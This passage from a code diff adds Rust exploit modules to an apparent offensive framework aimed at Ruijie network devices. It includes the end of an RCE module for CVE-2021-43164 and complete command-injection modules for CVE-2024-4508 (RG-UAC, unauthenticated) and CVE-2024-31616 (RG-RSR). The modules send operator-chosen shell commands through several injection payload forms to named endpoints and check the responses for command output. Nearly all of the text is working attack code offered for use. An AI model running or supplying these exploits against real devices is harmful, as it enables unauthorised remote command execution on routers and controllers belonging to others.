println!("{} HTTP {} - Endpoint accessible", "[*]".yellow(), status);
}
},
Err(e) => {
println!("{} {} - {}", "[*]".dimmed(), endpoint, e);
}
}
}
}
// Test version check endpoint
let version_url = format!("{}/cgi-bin/luci/admin/system/version", base_url.trim_end_matches('/'));
println!("{} Checking firmware version...", "[*]".blue());
if let Ok(resp) = client.get(&version_url).send().await {
let text = resp.text().await.unwrap_or_default();
if text.contains("ReyeeOS") || text.contains("EW_3.0") {
println!("{} Found Ruijie ReyeeOS - potential target!", "[+]".green());
println!("{} Version info: {}", "[*]".blue(), &text[..text.len().min(200)]);
}
}
println!();
println!("{} Could not confirm RCE.", "[*]".yellow());
println!("{} Device may be patched (version > EW_3.0(1)B11P55).", "[*]".cyan());
Ok(())
}
fn print_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ Ruijie RG-EW updateVersion RCE (CVE-2021-43164) ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
}
@@ -0,0 +1,118 @@
use anyhow::Result;
use colored::*;
use reqwest::Client;
use std::time::Duration;
use crate::utils::{prompt_required, normalize_target, prompt_default};
/// Ruijie RG-UAC OS Command Injection (CVE-2024-4508)
///
/// Affects: RG-UAC (Unified Access Controller)
/// Critical command injection in static_route_edit_ipv6.php
/// CVSS: 9.8 (Critical) - Unauthenticated Remote Attack
/// Reference: VulDB / GitHub
const TIMEOUT_SECS: u64 = 10;
pub async fn run(target: &str) -> Result<()> {
print_banner();
let raw_target = if target.is_empty() {
prompt_required("Target IP/URL")?
} else {
target.to_string()
};
let normalized = normalize_target(&raw_target)?;
let base_url = if normalized.contains("://") {
normalized.clone()
} else {
format!("http://{}", normalized)
};
println!("{} Target: {}", "[*]".blue(), base_url);
let cmd = prompt_default("Command to execute", "id")?;
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(TIMEOUT_SECS))
.build()?;
// Vulnerability is in static_route_edit_ipv6.php
// Command injection via route parameter manipulation
let exploit_url = format!("{}/static_route_edit_ipv6.php", base_url.trim_end_matches('/'));
println!("{} Testing command injection at {}...", "[*]".blue(), exploit_url);
// Various injection payloads
let injections = vec![
format!(";{};", cmd),
format!("|{}", cmd),
format!("$({})", cmd),
format!("`{}`", cmd),
];
for injection in &injections {
let payload = serde_json::json!({
"action": "add",
"destination": injection,
"gateway": "fe80::1",
"interface": "eth0"
});
println!("{} Trying injection: {} ...", "[*]".dimmed(), injection.chars().take(30).collect::<String>());
match client.post(&exploit_url).json(&payload).send().await {
Ok(resp) => {
let status = resp.status();
let text = resp.text().await.unwrap_or_default();
if text.contains("uid=") || text.contains("root") {
println!("{} Command injection successful!", "[+]".green().bold());
println!("{} Output:", "[*]".blue());
for line in text.lines().take(15) {
println!(" {}", line);
}
println!("{} VULNERABLE to CVE-2024-4508!", "[VULN]".red().bold());
return Ok(());
}
if status.is_success() {
println!("{} HTTP {} - checking response...", "[*]".yellow(), status);
}
},
Err(e) => {
println!("{} Request failed: {}", "[-]".red(), e);
}
}
}
// Try alternate endpoint
let alt_url = format!("{}/cgi-bin/cli.cgi", base_url.trim_end_matches('/'));
println!("{} Trying alternate endpoint: {}", "[*]".blue(), alt_url);
let alt_payload = format!("cmd=show%20version;{}", urlencoding::encode(&cmd));
if let Ok(resp) = client.post(&alt_url)
.header("Content-Type", "application/x-www-form-urlencoded")
.body(alt_payload)
.send()
.await {
let text = resp.text().await.unwrap_or_default();
if !text.is_empty() {
println!("{} Response: {}", "[*]".blue(), &text[..text.len().min(300)]);
}
}
println!();
println!("{} Could not confirm vulnerability.", "[*]".yellow());
println!("{} Ensure target is running Ruijie RG-UAC.", "[*]".cyan());
Ok(())
}
fn print_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ Ruijie RG-UAC Command Injection (CVE-2024-4508) ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
}
@@ -0,0 +1,123 @@
use anyhow::Result;
use colored::*;
use reqwest::Client;
use std::time::Duration;
use crate::utils::{prompt_required, prompt_default, normalize_target};
/// Ruijie RG-RSR Router Command Injection (CVE-2024-31616)
///
/// Affects: RSR10-01G-T-S / RSR_3.0(1)B9P2
/// Arbitrary command execution via backtick injection in web management
/// Reference: github.com gist by security researcher
const TIMEOUT_SECS: u64 = 10;
pub async fn run(target: &str) -> Result<()> {
print_banner();
let raw_target = if target.is_empty() {
prompt_required("Target IP/URL")?
} else {
target.to_string()
};
let normalized = normalize_target(&raw_target)?;
let base_url = if normalized.contains("://") {
normalized.clone()
} else {
format!("http://{}", normalized)
};
println!("{} Target: {}", "[*]".blue(), base_url);
// Authentication is typically required
let username = prompt_default("Username", "admin")?;
let password = prompt_required("Password")?;
let cmd = prompt_default("Command to execute", "id")?;
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(TIMEOUT_SECS))
.cookie_store(true)
.build()?;
// First authenticate
println!("{} Authenticating...", "[*]".blue());
let login_url = format!("{}/login.cgi", base_url.trim_end_matches('/'));
let login_payload = serde_json::json!({
"username": username,
"password": password
});
let login_res = client.post(&login_url)
.json(&login_payload)
.send()
.await;
match login_res {
Ok(r) if r.status().is_success() => {
println!("{} Authentication successful!", "[+]".green());
},
Ok(r) => {
println!("{} Login returned HTTP {}. Continuing anyway...", "[!]".yellow(), r.status());
},
Err(e) => {
println!("{} Login failed: {}. Continuing anyway...", "[!]".yellow(), e);
}
}
// Command injection via backtick
// The vulnerability is in various diagnostic endpoints
let injection = format!("`{}`", cmd);
let exploit_endpoints = vec![
format!("{}/cgi-bin/luci/admin/settings/diag?cmd=ping&ip={}",
base_url.trim_end_matches('/'), urlencoding::encode(&injection)),
format!("{}/goform/RgDiagnose?cmd=ping&host={}",
base_url.trim_end_matches('/'), urlencoding::encode(&injection)),
format!("{}/cgi-bin/diag.cgi?action=ping&target={}",
base_url.trim_end_matches('/'), urlencoding::encode(&injection)),
];
println!("{} Sending command injection payload...", "[*]".blue());
for endpoint in &exploit_endpoints {
println!("{} Trying: {}", "[*]".dimmed(), endpoint);
match client.get(endpoint).send().await {
Ok(resp) => {
let status = resp.status();
let text = resp.text().await.unwrap_or_default();
if status.is_success() || text.contains("uid=") || text.len() > 100 {
println!("{} Potential command execution at endpoint!", "[+]".green().bold());
println!("{} Response ({} bytes):", "[*]".blue(), text.len());
for line in text.lines().take(20) {
println!(" {}", line);
}
if text.contains("uid=") || text.contains("root") {
println!("{} Command output detected - VULNERABLE!", "[VULN]".red().bold());
}
return Ok(());
}
},
Err(e) => {
println!("{} Failed: {}", "[*]".dimmed(), e);
}
}
}
println!();
println!("{} Could not confirm exploitation.", "[*]".yellow());
println!("{} Try manual testing with different endpoints.", "[*]".cyan());
Ok(())
}
fn print_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ Ruijie RG-RSR Router Command Injection (CVE-2024-31616) ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
}
+6
View File
@@ -6,6 +6,12 @@ use std::time::Duration;
const DEFAULT_TIMEOUT_SECS: u64 = 10;
/// A basic demonstration exploit that checks if a specific endpoint is "vulnerable"
///
/// # Developer Note
/// This module serves as a template for new exploits.
/// - Always use `?` for error handling (no `unwrap()`).
/// - Use `anyhow::Context` to provide helpful error messages.
/// - Respect the `target` argument.
pub async fn run(target: &str) -> Result<()> {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ Sample Exploit Module - Demonstration ║".cyan());

Some files were not shown because too many files have changed in this diff Show More